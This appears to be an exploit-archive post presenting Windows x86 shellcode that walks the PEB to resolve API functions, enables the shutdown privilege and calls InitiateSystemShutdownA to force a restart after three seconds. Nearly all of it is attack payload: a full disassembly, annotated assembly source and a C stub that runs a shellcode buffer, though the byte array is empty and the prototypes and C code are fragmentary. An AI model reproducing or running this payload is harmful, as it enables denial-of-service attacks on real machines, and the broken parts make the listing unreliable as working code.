	# Title: Windows x86 InitiateSystemShutdownA() shellcode
	# Date : 18-08-2016
	# Author : Roziul Hasan Khan Shifat
	# Tested on : Windows 7 x86 starter

Disassembly of section .text:

00000000 <_start>:
   0:	31 c9                	xor    %ecx,%ecx
   2:	64 8b 41 30          	mov    %fs:0x30(%ecx),%eax
   6:	8b 40 0c             	mov    0xc(%eax),%eax
   9:	8b 70 14             	mov    0x14(%eax),%esi
   c:	ad                   	lods   %ds:(%esi),%eax
   d:	96                   	xchg   %eax,%esi
   e:	ad                   	lods   %ds:(%esi),%eax
   f:	8b 48 10             	mov    0x10(%eax),%ecx
  12:	8b 59 3c             	mov    0x3c(%ecx),%ebx
  15:	01 cb                	add    %ecx,%ebx
  17:	8b 5b 78             	mov    0x78(%ebx),%ebx
  1a:	01 cb                	add    %ecx,%ebx
  1c:	8b 73 20             	mov    0x20(%ebx),%esi
  1f:	01 ce                	add    %ecx,%esi
  21:	31 d2                	xor    %edx,%edx

00000023 <g>:
  23:	42                   	inc    %edx
  24:	ad                   	lods   %ds:(%esi),%eax
  25:	01 c8                	add    %ecx,%eax
  27:	81 38 47 65 74 50    	cmpl   $0x50746547,(%eax)
  2d:	75 f4                	jne    23 <g>
  2f:	81 78 04 72 6f 63 41 	cmpl   $0x41636f72,0x4(%eax)
  36:	75 eb                	jne    23 <g>
  38:	81 78 08 64 64 72 65 	cmpl   $0x65726464,0x8(%eax)
  3f:	75 e2                	jne    23 <g>
  41:	8b 73 1c             	mov    0x1c(%ebx),%esi
  44:	01 ce                	add    %ecx,%esi
  46:	8b 14 96             	mov    (%esi,%edx,4),%edx
  49:	01 ca                	add    %ecx,%edx
  4b:	89 cf                	mov    %ecx,%edi
  4d:	31 c0                	xor    %eax,%eax
  4f:	50                   	push   %eax
  50:	83 ec 1c             	sub    $0x1c,%esp
  53:	8d 34 24             	lea    (%esp),%esi
  56:	89 16                	mov    %edx,(%esi)
  58:	50                   	push   %eax
  59:	68 6f 6b 65 6e       	push   $0x6e656b6f
  5e:	68 65 73 73 54       	push   $0x54737365
  63:	68 50 72 6f 63       	push   $0x636f7250
  68:	68 4f 70 65 6e       	push   $0x6e65704f
  6d:	8d 04 24             	lea    (%esp),%eax
  70:	50                   	push   %eax
  71:	51                   	push   %ecx
  72:	ff d2                	call   *%edx
  74:	89 46 04             	mov    %eax,0x4(%esi)
  77:	83 c4 10             	add    $0x10,%esp
  7a:	31 c9                	xor    %ecx,%ecx
  7c:	68 73 41 42 42       	push   $0x42424173
  81:	88 4c 24 01          	mov    %cl,0x1(%esp)
  85:	68 6f 63 65 73       	push   $0x7365636f
  8a:	68 6e 74 50 72       	push   $0x7250746e
  8f:	68 75 72 72 65       	push   $0x65727275
  94:	68 47 65 74 43       	push   $0x43746547
  99:	8d 0c 24             	lea    (%esp),%ecx
  9c:	51                   	push   %ecx
  9d:	57                   	push   %edi
  9e:	8b 16                	mov    (%esi),%edx
  a0:	ff d2                	call   *%edx
  a2:	83 c4 14             	add    $0x14,%esp
  a5:	89 46 08             	mov    %eax,0x8(%esi)
  a8:	31 c9                	xor    %ecx,%ecx
  aa:	68 65 73 73 41       	push   $0x41737365
  af:	88 4c 24 03          	mov    %cl,0x3(%esp)
  b3:	68 50 72 6f 63       	push   $0x636f7250
  b8:	68 45 78 69 74       	push   $0x74697845
  bd:	8d 0c 24             	lea    (%esp),%ecx
  c0:	51                   	push   %ecx
  c1:	57                   	push   %edi
  c2:	8b 16                	mov    (%esi),%edx
  c4:	ff d2                	call   *%edx
  c6:	83 c4 0c             	add    $0xc,%esp
  c9:	89 46 0c             	mov    %eax,0xc(%esi)
  cc:	31 c9                	xor    %ecx,%ecx
  ce:	51                   	push   %ecx
  cf:	68 61 72 79 41       	push   $0x41797261
  d4:	68 4c 69 62 72       	push   $0x7262694c
  d9:	68 4c 6f 61 64       	push   $0x64616f4c
  de:	8d 0c 24             	lea    (%esp),%ecx
  e1:	51                   	push   %ecx
  e2:	57                   	push   %edi
  e3:	8b 16                	mov    (%esi),%edx
  e5:	ff d2                	call   *%edx
  e7:	83 c4 0c             	add    $0xc,%esp
  ea:	68 2e 64 6c 6c       	push   $0x6c6c642e
  ef:	68 70 69 33 32       	push   $0x32336970
  f4:	68 61 64 76 61       	push   $0x61766461
  f9:	8d 0c 24             	lea    (%esp),%ecx
  fc:	51                   	push   %ecx
  fd:	ff d0                	call   *%eax
  ff:	83 c4 0c             	add    $0xc,%esp
 102:	89 c7                	mov    %eax,%edi
 104:	31 c9                	xor    %ecx,%ecx
 106:	68 41 42 42 42       	push   $0x42424241
 10b:	88 4c 24 01          	mov    %cl,0x1(%esp)
 10f:	68 61 6c 75 65       	push   $0x65756c61
 114:	68 65 67 65 56       	push   $0x56656765
 119:	68 69 76 69 6c       	push   $0x6c697669
 11e:	68 75 70 50 72       	push   $0x72507075
 123:	68 4c 6f 6f 6b       	push   $0x6b6f6f4c
 128:	8d 0c 24             	lea    (%esp),%ecx
 12b:	51                   	push   %ecx
 12c:	50                   	push   %eax
 12d:	8b 16                	mov    (%esi),%edx
 12f:	ff d2                	call   *%edx
 131:	83 c4 18             	add    $0x18,%esp
 134:	89 46 10             	mov    %eax,0x10(%esi)
 137:	31 c9                	xor    %ecx,%ecx
 139:	68 73 41 41 41       	push   $0x41414173
 13e:	88 4c 24 01          	mov    %cl,0x1(%esp)
 142:	68 6c 65 67 65       	push   $0x6567656c
 147:	68 72 69 76 69       	push   $0x69766972
 14c:	68 6b 65 6e 50       	push   $0x506e656b
 151:	68 73 74 54 6f       	push   $0x6f547473
 156:	68 41 64 6a 75       	push   $0x756a6441
 15b:	8d 0c 24             	lea    (%esp),%ecx
 15e:	51                   	push   %ecx
 15f:	57                   	push   %edi
 160:	8b 16                	mov    (%esi),%edx
 162:	ff d2                	call   *%edx
 164:	83 c4 18             	add    $0x18,%esp
 167:	89 46 14             	mov    %eax,0x14(%esi)
 16a:	31 c9                	xor    %ecx,%ecx
 16c:	68 77 6e 41 42       	push   $0x42416e77
 171:	88 4c 24 03          	mov    %cl,0x3(%esp)
 175:	68 75 74 64 6f       	push   $0x6f647475
 17a:	68 65 6d 53 68       	push   $0x68536d65
 17f:	68 53 79 73 74       	push   $0x74737953
 184:	68 69 61 74 65       	push   $0x65746169
 189:	68 49 6e 69 74       	push   $0x74696e49
 18e:	8d 0c 24             	lea    (%esp),%ecx
 191:	51                   	push   %ecx
 192:	57                   	push   %edi
 193:	8b 16                	mov    (%esi),%edx
 195:	ff d2                	call   *%edx
 197:	83 c4 18             	add    $0x18,%esp
 19a:	89 46 18             	mov    %eax,0x18(%esi)
 19d:	31 c0                	xor    %eax,%eax
 19f:	50                   	push   %eax
 1a0:	83 ec 14             	sub    $0x14,%esp
 1a3:	8d 3c 24             	lea    (%esp),%edi

000001a6 <proc_start>:
 1a6:	8b 46 08             	mov    0x8(%esi),%eax
 1a9:	ff d0                	call   *%eax
 1ab:	31 d2                	xor    %edx,%edx
 1ad:	8d 17                	lea    (%edi),%edx
 1af:	52                   	push   %edx
 1b0:	31 c9                	xor    %ecx,%ecx
 1b2:	b1 28                	mov    $0x28,%cl
 1b4:	51                   	push   %ecx
 1b5:	50                   	push   %eax
 1b6:	8b 4e 04             	mov    0x4(%esi),%ecx
 1b9:	ff d1                	call   *%ecx
 1bb:	8d 57 04             	lea    0x4(%edi),%edx
 1be:	8d 52 04             	lea    0x4(%edx),%edx
 1c1:	8d 12                	lea    (%edx),%edx
 1c3:	31 c9                	xor    %ecx,%ecx
 1c5:	68 65 67 65 41       	push   $0x41656765
 1ca:	88 4c 24 03          	mov    %cl,0x3(%esp)
 1ce:	68 69 76 69 6c       	push   $0x6c697669
 1d3:	68 77 6e 50 72       	push   $0x72506e77
 1d8:	68 75 74 64 6f       	push   $0x6f647475
 1dd:	68 53 65 53 68       	push   $0x68536553
 1e2:	8d 0c 24             	lea    (%esp),%ecx
 1e5:	31 db                	xor    %ebx,%ebx
 1e7:	52                   	push   %edx
 1e8:	51                   	push   %ecx
 1e9:	53                   	push   %ebx
 1ea:	8b 5e 10             	mov    0x10(%esi),%ebx
 1ed:	ff d3                	call   *%ebx
 1ef:	8d 57 04             	lea    0x4(%edi),%edx
 1f2:	31 c9                	xor    %ecx,%ecx
 1f4:	41                   	inc    %ecx
 1f5:	89 0a                	mov    %ecx,(%edx)
 1f7:	8d 52 04             	lea    0x4(%edx),%edx
 1fa:	41                   	inc    %ecx
 1fb:	89 4a 08             	mov    %ecx,0x8(%edx)
 1fe:	31 d2                	xor    %edx,%edx
 200:	52                   	push   %edx
 201:	52                   	push   %edx
 202:	52                   	push   %edx
 203:	8d 57 04             	lea    0x4(%edi),%edx
 206:	52                   	push   %edx
 207:	31 d2                	xor    %edx,%edx
 209:	52                   	push   %edx
 20a:	8b 17                	mov    (%edi),%edx
 20c:	52                   	push   %edx
 20d:	8b 56 14             	mov    0x14(%esi),%edx
 210:	ff d2                	call   *%edx
 212:	31 c9                	xor    %ecx,%ecx
 214:	51                   	push   %ecx
 215:	68 6e 64 73 21       	push   $0x2173646e
 21a:	68 73 65 63 6f       	push   $0x6f636573
 21f:	68 41 20 33 20       	push   $0x20332041
 224:	68 6d 2e 45 54       	push   $0x54452e6d
 229:	68 79 73 74 65       	push   $0x65747379
 22e:	68 6e 67 20 53       	push   $0x5320676e
 233:	68 61 72 74 49       	push   $0x49747261
 238:	68 52 65 73 74       	push   $0x74736552
 23d:	8d 1c 24             	lea    (%esp),%ebx
 240:	41                   	inc    %ecx
 241:	51                   	push   %ecx
 242:	31 c9                	xor    %ecx,%ecx
 244:	51                   	push   %ecx
 245:	b1 03                	mov    $0x3,%cl
 247:	51                   	push   %ecx
 248:	53                   	push   %ebx
 249:	31 c9                	xor    %ecx,%ecx
 24b:	51                   	push   %ecx
 24c:	8b 4e 18             	mov    0x18(%esi),%ecx
 24f:	ff d1                	call   *%ecx
 251:	8b 4e 0c             	mov    0xc(%esi),%ecx
 254:	50                   	push   %eax
 255:	ff d1                	call   *%ecx


HANDLE 4 bytes

LUID 8 bytes
SE_SHUTDOWN_NAME = "SeShutdownPrivilege"

required functions:

1.  WINADVAPI WINBOOL WINAPI OpenProcessToken (HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle);

3.  WINADVAPI WINBOOL WINAPI LookupPrivilegeValueA (LPCSTR lpSystemName, LPCSTR lpName, PLUID lpLuid);
4.  WINADVAPI WINBOOL WINAPI AdjustTokenPrivileges (HANDLE TokenHandle, WINBOOL DisableAllPrivileges, PTOKEN_PRIVILEGES NewState, DWORD BufferLength, PTOKEN_PRIVILEGES PreviousState, PDWORD ReturnLength);
5.  WINADVAPI WINBOOL WINAPI InitiateSystemShutdownA(LPSTR lpMachineName,LPSTR lpMessage,DWORD dwTimeout,WINBOOL bForceAppsClosed,WINBOOL bRebootAfterShutdown);

8.LoadLibraryA() [1 time use]

required dll:




required macro and custom data types:

	 typedef struct _TOKEN_PRIVILEGES {
      DWORD PrivilegeCount;
	 typedef struct _LUID_AND_ATTRIBUTES {
      LUID Luid;
      DWORD Attributes;
	 typedef struct _LUID {
    DWORD LowPart;
    LONG HighPart;

c code:

#include <windows.h>

int main(){
	if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&h))
	return 0;
	AdjustTokenPrivileges(h, FALSE, &t, 0,NULL, 0);

section .text
	global _start

xor ecx,ecx

mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB->Ldr
mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
xchg esi,eax
mov ecx,[eax+0x10] ;kernel32.dll base address

mov ebx,[ecx+0x3c] ;DOS->elf_anew
add ebx,ecx ;PE HEADER
mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress

mov esi,[ebx+0x20] ;AddressOfNames
add esi,ecx

xor edx,edx

inc edx
add eax,ecx
cmp dword [eax],'GetP'
jnz g
cmp dword [eax+4],'rocA'
jnz g
cmp dword [eax+8],'ddre'
jnz g

mov esi,[ebx+0x1c] ;AddressOfFunctions
add esi,ecx

mov edx,[esi+edx*4]
add edx,ecx ;GetProcAddress()

mov edi,ecx ;kernel32.dll

xor eax,eax
push eax
sub esp,28

lea esi,[esp]

mov [esi],dword edx ;GetProcAddress() at offset 0

;finding address of OpenProcessToken()

push eax
push 0x6e656b6f
push 0x54737365
push 0x636f7250
push 0x6e65704f

lea eax,[esp]
push eax
push ecx

call edx
mov [esi+4],dword eax ;OpenProcessToken() at offset 4
add esp,0x10

;finding address of GetCurrentProcess()
xor ecx,ecx
push 0x42424173
mov [esp+1],byte cl
push 0x7365636f
push 0x7250746e
push 0x65727275
push 0x43746547

lea ecx,[esp]
push ecx
push edi

mov edx,dword [esi]
call edx
add esp,20
mov [esi+8],dword eax ;GetCurrentProcess() at offset 8

;finding address of ExitProcess()
xor ecx,ecx
push 0x41737365
mov [esp+3],byte cl
push 0x636f7250
push 0x74697845

lea ecx,[esp]

push ecx
push edi
mov edx,dword [esi]
call edx
add esp,12
mov [esi+12],dword eax ;ExitProcess() at offset 12

;finding address of LoadLibraryA()
xor ecx,ecx
push ecx
push 0x41797261
push 0x7262694c
push 0x64616f4c

lea ecx,[esp]
push ecx
push edi

mov edx,dword [esi]
call edx
add esp,12

push 0x6c6c642e
push 0x32336970
push 0x61766461

lea ecx,[esp]
push ecx
call eax
add esp,12
mov edi,eax ; advapi32.dll
;finding address of LookupPrivilegeValueA()
xor ecx,ecx
push 0x42424241
mov [esp+1],byte cl
push 0x65756c61
push 0x56656765
push 0x6c697669
push 0x72507075
push 0x6b6f6f4c

lea ecx,[esp]
push ecx
push eax

mov edx,dword [esi]
call edx

add esp,0x18
mov [esi+16],dword eax ;LookupPrivilegeValueA() at offset 16

;finding address of AdjustTokenPrivileges()
xor ecx,ecx
push 0x41414173
mov [esp+1],byte cl
push 0x6567656c
push 0x69766972
push 0x506e656b
push 0x6f547473
push 0x756a6441

lea ecx,[esp]
push ecx
push edi

mov edx,dword [esi]
call edx
add esp,0x18
mov [esi+20],dword eax ;AdjustTokenPrivileges() at offset 20

;finding address of InitiateSystemShutdownA()

xor ecx,ecx
push 0x42416e77
mov [esp+3],byte cl
push 0x6f647475
push 0x68536d65
push 0x74737953
push 0x65746169
push 0x74696e49

lea ecx,[esp]
push ecx
push edi

mov edx,dword [esi]
call edx
add esp,0x18
mov [esi+24],dword eax ;InitiateSystemShutdownA() at offset 24

xor eax,eax
push eax

sub esp,20
lea edi,[esp] ;HANDLE+TOKEN_PRIVILEGES address

;GetProcAddress() at offset 0
;OpenProcessToken() at offset 4
;GetCurrentProcess() at offset 8
;ExitProcess() at offset 12
;LookupPrivilegeValueA() at offset 16
;AdjustTokenPrivileges() at offset 20
;InitiateSystemShutdownA() at offset 24




mov eax,[esi+8]
call eax


xor edx,edx
lea edx,[edi]
push edx
xor ecx,ecx
mov cl,40

push ecx
push eax

mov ecx,[esi+4]
call ecx


lea edx,[edi+4]
lea edx,[edx+4]

lea edx,[edx]

xor ecx,ecx

push 0x41656765
mov [esp+3],byte cl
push 0x6c697669
push 0x72506e77
push 0x6f647475
push 0x68536553

lea ecx,[esp]

xor ebx,ebx

push edx
push ecx
push ebx

mov ebx,[esi+16]
call ebx
;AdjustTokenPrivileges(HANDLE, FALSE, &TOKEN_PRIVILEGES, 0,NULL, 0);
lea edx,[edi+4]
xor ecx,ecx
inc ecx
mov [edx],dword ecx
lea edx,[edx+4]
inc ecx
mov [edx+8],dword ecx

xor edx,edx
push edx
push edx
push edx

lea edx,[edi+4]
push edx

xor edx,edx
push edx

mov edx,dword [edi]

push edx

mov edx,[esi+20]
call edx

;InitiateSystemShutdownA(NULL,"RestartIng System.ETA 3 seconds!",3,FALSE,1);

xor ecx,ecx

push ecx
push 0x2173646e
push 0x6f636573
push 0x20332041
push 0x54452e6d
push 0x65747379
push 0x5320676e
push 0x49747261
push 0x74736552

lea ebx,[esp] ;Message "RestartIng System.ETA 3 seconds!"

inc ecx ;if U want to shutdown system , just remove this line

push ecx

xor ecx,ecx
push ecx

mov cl,3 ;3 seconds
push ecx
push ebx 
xor ecx,ecx
push ecx

mov ecx,[esi+24]
call ecx

mov ecx,[esi+12]
push eax
call ecx

char shellcode[]=\


printf("shellcode lenght %ld\n",(long)strlen(shellcode));
(* (int(*)()) shellcode) ();